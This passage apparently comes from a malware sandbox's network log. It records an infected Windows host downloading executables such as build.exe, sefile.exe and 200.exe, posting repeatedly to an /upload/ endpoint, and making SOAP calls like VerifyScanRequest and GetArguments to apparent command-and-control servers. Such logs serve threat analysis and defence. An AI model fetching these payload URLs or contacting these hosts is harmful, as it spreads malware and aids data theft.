                                                                HTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Mon, 28 Jun 2021 16:05:19 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Vary: Accept-Encoding
                                                                X-Powered-By: PHP/7.3.21
                                                              • flag-unknown
                                                                POST
                                                                http://uyg5wye.2ihsfa.com/api/?sid=3067&key=d2b40fda1b3933e19a6b502eeaa1f58e
                                                                Remote address:
                                                                88.218.92.148:80
                                                                Request
                                                                POST /api/?sid=3067&key=d2b40fda1b3933e19a6b502eeaa1f58e HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                Content-Length: 266
                                                                Host: uyg5wye.2ihsfa.com
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Mon, 28 Jun 2021 16:05:20 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Vary: Accept-Encoding
                                                                X-Powered-By: PHP/7.3.21
                                                              • flag-unknown
                                                                DNS
                                                                www.microsoft.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                www.microsoft.com
                                                                IN A
                                                                Response
                                                                www.microsoft.com
                                                                IN CNAME
                                                                www.microsoft.com-c-3.edgekey.net
                                                                www.microsoft.com-c-3.edgekey.net
                                                                IN CNAME
                                                                www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
                                                                www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
                                                                IN CNAME
                                                                e13678.dscb.akamaiedge.net
                                                                e13678.dscb.akamaiedge.net
                                                                IN A
                                                                2.21.41.70
                                                              • flag-unknown
                                                                POST
                                                                http://157.90.127.76/865
                                                                Remote address:
                                                                157.90.127.76:80
                                                                Request
                                                                POST /865 HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                Content-Length: 25
                                                                Host: 157.90.127.76
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Mon, 28 Jun 2021 16:05:32 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Vary: Accept-Encoding
                                                                Content-Encoding: gzip
                                                              • flag-unknown
                                                                POST
                                                                http://157.90.127.76/
                                                                Remote address:
                                                                157.90.127.76:80
                                                                Request
                                                                POST / HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                Content-Length: 3528
                                                                Host: 157.90.127.76
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Mon, 28 Jun 2021 16:05:33 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Content-Encoding: gzip
                                                              • flag-unknown
                                                                GET
                                                                http://uyg5wye.2ihsfa.com/api/fbtime
                                                                Remote address:
                                                                88.218.92.148:80
                                                                Request
                                                                GET /api/fbtime HTTP/1.1
                                                                Connection: Keep-Alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                Host: uyg5wye.2ihsfa.com
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Mon, 28 Jun 2021 16:05:38 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Vary: Accept-Encoding
                                                                X-Powered-By: PHP/7.3.21
                                                              • flag-unknown
                                                                POST
                                                                http://uyg5wye.2ihsfa.com/api/?sid=3227&key=ca741ea974de738c9faec1d9442649eb
                                                                Remote address:
                                                                88.218.92.148:80
                                                                Request
                                                                POST /api/?sid=3227&key=ca741ea974de738c9faec1d9442649eb HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                Content-Length: 266
                                                                Host: uyg5wye.2ihsfa.com
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Mon, 28 Jun 2021 16:05:39 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Vary: Accept-Encoding
                                                                X-Powered-By: PHP/7.3.21
                                                              • flag-unknown
                                                                POST
                                                                http://136.144.41.152/base/api/getData.php
                                                                Remote address:
                                                                136.144.41.152:80
                                                                Request
                                                                POST /base/api/getData.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                Content-Length: 433
                                                                Host: 136.144.41.152
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:06:00 GMT
                                                                Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
                                                                X-Powered-By: PHP/7.3.28
                                                                Content-Length: 108
                                                                Keep-Alive: timeout=5, max=100
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                              • flag-unknown
                                                                POST
                                                                http://136.144.41.152/base/api/getData.php
                                                                Remote address:
                                                                136.144.41.152:80
                                                                Request
                                                                POST /base/api/getData.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                Content-Length: 133
                                                                Host: 136.144.41.152
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:06:00 GMT
                                                                Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
                                                                X-Powered-By: PHP/7.3.28
                                                                Content-Length: 108
                                                                Keep-Alive: timeout=5, max=99
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                              • flag-unknown
                                                                DNS
                                                                iplis.ru
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                iplis.ru
                                                                IN A
                                                                Response
                                                                iplis.ru
                                                                IN A
                                                                88.99.66.31
                                                              • flag-unknown
                                                                POST
                                                                http://zedaumalev.xyz/
                                                                Remote address:
                                                                77.246.145.4:80
                                                                Request
                                                                POST / HTTP/1.1
                                                                Content-Type: text/xml; charset=utf-8
                                                                SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"
                                                                Host: zedaumalev.xyz
                                                                Content-Length: 7439
                                                                Expect: 100-continue
                                                                Accept-Encoding: gzip, deflate
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Mon, 28 Jun 2021 16:06:03 GMT
                                                                Content-Type: text/xml; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Keep-Alive: timeout=3
                                                                Vary: Accept-Encoding
                                                                Content-Encoding: gzip
                                                              • flag-unknown
                                                                POST
                                                                http://zedaumalev.xyz/
                                                                Remote address:
                                                                77.246.145.4:80
                                                                Request
                                                                POST / HTTP/1.1
                                                                Content-Type: text/xml; charset=utf-8
                                                                SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                Host: zedaumalev.xyz
                                                                Content-Length: 7425
                                                                Expect: 100-continue
                                                                Accept-Encoding: gzip, deflate
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Mon, 28 Jun 2021 16:06:03 GMT
                                                                Content-Type: text/xml; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Keep-Alive: timeout=3
                                                                Vary: Accept-Encoding
                                                                Content-Encoding: gzip
                                                              • flag-unknown
                                                                DNS
                                                                ppcspb.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                ppcspb.com
                                                                IN A
                                                                Response
                                                              • flag-unknown
                                                                DNS
                                                                ppcspb.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                ppcspb.com
                                                                IN A
                                                                Response
                                                              • flag-unknown
                                                                DNS
                                                                ppcspb.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                ppcspb.com
                                                                IN A
                                                                Response
                                                              • flag-unknown
                                                                DNS
                                                                ppcspb.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                ppcspb.com
                                                                IN A
                                                                Response
                                                              • flag-unknown
                                                                DNS
                                                                mebbing.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                mebbing.com
                                                                IN A
                                                                Response
                                                              • flag-unknown
                                                                DNS
                                                                mebbing.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                mebbing.com
                                                                IN A
                                                                Response
                                                              • flag-unknown
                                                                DNS
                                                                mebbing.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                mebbing.com
                                                                IN A
                                                                Response
                                                              • flag-unknown
                                                                DNS
                                                                mebbing.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                mebbing.com
                                                                IN A
                                                                Response
                                                              • flag-unknown
                                                                DNS
                                                                twcamel.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                twcamel.com
                                                                IN A
                                                                Response
                                                              • flag-unknown
                                                                DNS
                                                                twcamel.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                twcamel.com
                                                                IN A
                                                                Response
                                                              • flag-unknown
                                                                DNS
                                                                twcamel.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                twcamel.com
                                                                IN A
                                                                Response
                                                              • flag-unknown
                                                                DNS
                                                                twcamel.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                twcamel.com
                                                                IN A
                                                                Response
                                                              • flag-unknown
                                                                DNS
                                                                howdycash.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                howdycash.com
                                                                IN A
                                                                Response
                                                              • flag-unknown
                                                                DNS
                                                                howdycash.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                howdycash.com
                                                                IN A
                                                                Response
                                                              • flag-unknown
                                                                DNS
                                                                howdycash.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                howdycash.com
                                                                IN A
                                                                Response
                                                              • flag-unknown
                                                                DNS
                                                                howdycash.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                howdycash.com
                                                                IN A
                                                                Response
                                                              • flag-unknown
                                                                DNS
                                                                lahuertasonora.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                lahuertasonora.com
                                                                IN A
                                                                Response
                                                                lahuertasonora.com
                                                                IN A
                                                                79.106.245.34
                                                                lahuertasonora.com
                                                                IN A
                                                                175.117.131.126
                                                                lahuertasonora.com
                                                                IN A
                                                                211.53.230.69
                                                                lahuertasonora.com
                                                                IN A
                                                                115.91.217.231
                                                                lahuertasonora.com
                                                                IN A
                                                                152.171.10.3
                                                                lahuertasonora.com
                                                                IN A
                                                                91.203.174.38
                                                                lahuertasonora.com
                                                                IN A
                                                                179.38.125.180
                                                                lahuertasonora.com
                                                                IN A
                                                                190.141.221.178
                                                                lahuertasonora.com
                                                                IN A
                                                                211.169.6.249
                                                                lahuertasonora.com
                                                                IN A
                                                                37.75.44.24
                                                              • flag-unknown
                                                                POST
                                                                http://lahuertasonora.com/upload/
                                                                Remote address:
                                                                79.106.245.34:80
                                                                Request
                                                                POST /upload/ HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://lahuertasonora.com/upload/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 300
                                                                Host: lahuertasonora.com
                                                                Response
                                                                HTTP/1.0 404 Not Found
                                                                Date: Mon, 28 Jun 2021 16:07:31 GMT
                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                X-Powered-By: PHP/5.6.40
                                                                Content-Length: 8
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                              • flag-unknown
                                                                POST
                                                                http://lahuertasonora.com/upload/
                                                                Remote address:
                                                                79.106.245.34:80
                                                                Request
                                                                POST /upload/ HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://lahuertasonora.com/upload/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 233
                                                                Host: lahuertasonora.com
                                                                Response
                                                                HTTP/1.0 404 Not Found
                                                                Date: Mon, 28 Jun 2021 16:07:32 GMT
                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                X-Powered-By: PHP/5.6.40
                                                                Content-Length: 40
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                              • flag-unknown
                                                                DNS
                                                                dgos.top
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                dgos.top
                                                                IN A
                                                                Response
                                                                dgos.top
                                                                IN A
                                                                43.132.165.55
                                                              • flag-unknown
                                                                GET
                                                                http://dgos.top/dl/build.exe
                                                                Remote address:
                                                                43.132.165.55:80
                                                                Request
                                                                GET /dl/build.exe HTTP/1.1
                                                                Connection: Keep-Alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Host: dgos.top
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:07:33 GMT
                                                                Server: Apache/2.4.6 (CentOS) PHP/5.6.40
                                                                Last-Modified: Mon, 28 Jun 2021 16:00:02 GMT
                                                                ETag: "dd200-5c5d595028d68"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 905728
                                                                Connection: close
                                                                Content-Type: application/octet-stream
                                                              • flag-unknown
                                                                POST
                                                                http://lahuertasonora.com/upload/
                                                                Remote address:
                                                                79.106.245.34:80
                                                                Request
                                                                POST /upload/ HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://lahuertasonora.com/upload/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 263
                                                                Host: lahuertasonora.com
                                                                Response
                                                                HTTP/1.0 404 Not Found
                                                                Date: Mon, 28 Jun 2021 16:07:38 GMT
                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                X-Powered-By: PHP/5.6.40
                                                                Content-Length: 334
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                              • flag-unknown
                                                                POST
                                                                http://lahuertasonora.com/upload/
                                                                Remote address:
                                                                79.106.245.34:80
                                                                Request
                                                                POST /upload/ HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://lahuertasonora.com/upload/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 295
                                                                Host: lahuertasonora.com
                                                                Response
                                                                HTTP/1.0 404 Not Found
                                                                Date: Mon, 28 Jun 2021 16:07:40 GMT
                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                X-Powered-By: PHP/5.6.40
                                                                Content-Length: 55
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                              • flag-unknown
                                                                GET
                                                                http://152.89.247.174/blog/files/sefile.exe
                                                                Remote address:
                                                                152.89.247.174:80
                                                                Request
                                                                GET /blog/files/sefile.exe HTTP/1.1
                                                                Connection: Keep-Alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Host: 152.89.247.174
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:07:41 GMT
                                                                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                                Last-Modified: Mon, 28 Jun 2021 16:00:04 GMT
                                                                ETag: "6c400-5c5d59527bea5"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 443392
                                                                Keep-Alive: timeout=5, max=100
                                                                Connection: Keep-Alive
                                                                Content-Type: application/octet-stream
                                                              • flag-unknown
                                                                POST
                                                                http://lahuertasonora.com/upload/
                                                                Remote address:
                                                                79.106.245.34:80
                                                                Request
                                                                POST /upload/ HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://lahuertasonora.com/upload/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 247
                                                                Host: lahuertasonora.com
                                                                Response
                                                                HTTP/1.0 404 Not Found
                                                                Date: Mon, 28 Jun 2021 16:07:43 GMT
                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                X-Powered-By: PHP/5.6.40
                                                                Content-Length: 334
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                              • flag-unknown
                                                                POST
                                                                http://lahuertasonora.com/upload/
                                                                Remote address:
                                                                79.106.245.34:80
                                                                Request
                                                                POST /upload/ HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://lahuertasonora.com/upload/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 165
                                                                Host: lahuertasonora.com
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:07:45 GMT
                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                X-Powered-By: PHP/5.6.40
                                                                Content-Length: 0
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                              • flag-unknown
                                                                POST
                                                                http://lahuertasonora.com/upload/
                                                                Remote address:
                                                                79.106.245.34:80
                                                                Request
                                                                POST /upload/ HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://lahuertasonora.com/upload/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 213
                                                                Host: lahuertasonora.com
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:07:47 GMT
                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                X-Powered-By: PHP/5.6.40
                                                                Content-Length: 0
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                              • flag-unknown
                                                                POST
                                                                http://lahuertasonora.com/upload/
                                                                Remote address:
                                                                79.106.245.34:80
                                                                Request
                                                                POST /upload/ HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://lahuertasonora.com/upload/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 243
                                                                Host: lahuertasonora.com
                                                                Response
                                                                HTTP/1.0 404 Not Found
                                                                Date: Mon, 28 Jun 2021 16:07:49 GMT
                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                X-Powered-By: PHP/5.6.40
                                                                Content-Length: 41
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                              • flag-unknown
                                                                DNS
                                                                sndvoices.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                sndvoices.com
                                                                IN A
                                                                Response
                                                              • flag-unknown
                                                                POST
                                                                http://185.215.113.62:51929/
                                                                Remote address:
                                                                185.215.113.62:51929
                                                                Request
                                                                POST / HTTP/1.1
                                                                Content-Type: text/xml; charset=utf-8
                                                                SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                Host: 185.215.113.62:51929
                                                                Content-Length: 137
                                                                Expect: 100-continue
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: Keep-Alive
                                                              • flag-unknown
                                                                GET
                                                                http://37.120.239.108/200.exe
                                                                Remote address:
                                                                37.120.239.108:80
                                                                Request
                                                                GET /200.exe HTTP/1.1
                                                                Connection: Keep-Alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Host: 37.120.239.108
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:07:51 GMT
                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                Last-Modified: Mon, 28 Jun 2021 14:40:03 GMT
                                                                ETag: "ab800-5c5d476feefcd"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 702464
                                                                Keep-Alive: timeout=5, max=100
                                                                Connection: Keep-Alive
                                                                Content-Type: application/octet-stream
                                                              • flag-unknown
                                                                POST
                                                                http://lahuertasonora.com/upload/
                                                                Remote address:
                                                                79.106.245.34:80
                                                                Request
                                                                POST /upload/ HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://lahuertasonora.com/upload/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 112
                                                                Host: lahuertasonora.com
                                                                Response
                                                                HTTP/1.0 404 Not Found
                                                                Date: Mon, 28 Jun 2021 16:07:53 GMT
                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                X-Powered-By: PHP/5.6.40
                                                                Content-Length: 334
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                              • flag-unknown
                                                                POST
                                                                http://lahuertasonora.com/upload/
                                                                Remote address:
                                                                79.106.245.34:80
                                                                Request
                                                                POST /upload/ HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://lahuertasonora.com/upload/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 142
                                                                Host: lahuertasonora.com
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:07:54 GMT
                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                X-Powered-By: PHP/5.6.40
                                                                Content-Length: 0
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                              • flag-unknown
                                                                POST
                                                                http://lahuertasonora.com/upload/
                                                                Remote address:
                                                                79.106.245.34:80
                                                                Request
                                                                POST /upload/ HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://lahuertasonora.com/upload/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 187
                                                                Host: lahuertasonora.com
                                                                Response
                                                                HTTP/1.0 404 Not Found
                                                                Date: Mon, 28 Jun 2021 16:07:55 GMT
                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                X-Powered-By: PHP/5.6.40
                                                                Content-Length: 334
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                              • flag-unknown
                                                                POST
                                                                http://lahuertasonora.com/upload/
                                                                Remote address:
                                                                79.106.245.34:80
                                                                Request
                                                                POST /upload/ HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://lahuertasonora.com/upload/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 347
                                                                Host: lahuertasonora.com
                                                                Response
                                                                HTTP/1.0 404 Not Found
                                                                Date: Mon, 28 Jun 2021 16:07:57 GMT
                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                X-Powered-By: PHP/5.6.40
                                                                Content-Length: 334
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                              • flag-unknown
                                                                POST
                                                                http://lahuertasonora.com/upload/
                                                                Remote address:
                                                                79.106.245.34:80
                                                                Request
                                                                POST /upload/ HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://lahuertasonora.com/upload/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 334
                                                                Host: lahuertasonora.com
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:07:58 GMT
                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                X-Powered-By: PHP/5.6.40
                                                                Content-Length: 0
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                              • flag-unknown
                                                                POST
                                                                http://lahuertasonora.com/upload/
                                                                Remote address:
                                                                79.106.245.34:80
                                                                Request
                                                                POST /upload/ HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://lahuertasonora.com/upload/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 239
                                                                Host: lahuertasonora.com
                                                                Response
                                                                HTTP/1.0 404 Not Found
                                                                Date: Mon, 28 Jun 2021 16:07:59 GMT
                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                X-Powered-By: PHP/5.6.40
                                                                Content-Length: 334
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                              • flag-unknown
                                                                DNS
                                                                api.2ip.ua
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                api.2ip.ua
                                                                IN A
                                                                Response
                                                                api.2ip.ua
                                                                IN A
                                                                77.123.139.190
                                                              • flag-unknown
                                                                POST
                                                                http://lahuertasonora.com/upload/
                                                                Remote address:
                                                                79.106.245.34:80
                                                                Request
                                                                POST /upload/ HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://lahuertasonora.com/upload/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 282
                                                                Host: lahuertasonora.com
                                                                Response
                                                                HTTP/1.0 404 Not Found
                                                                Date: Mon, 28 Jun 2021 16:08:02 GMT
                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                X-Powered-By: PHP/5.6.40
                                                                Content-Length: 334
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                              • flag-unknown
                                                                POST
                                                                http://185.215.113.64:8765/
                                                                Remote address:
                                                                185.215.113.64:8765
                                                                Request
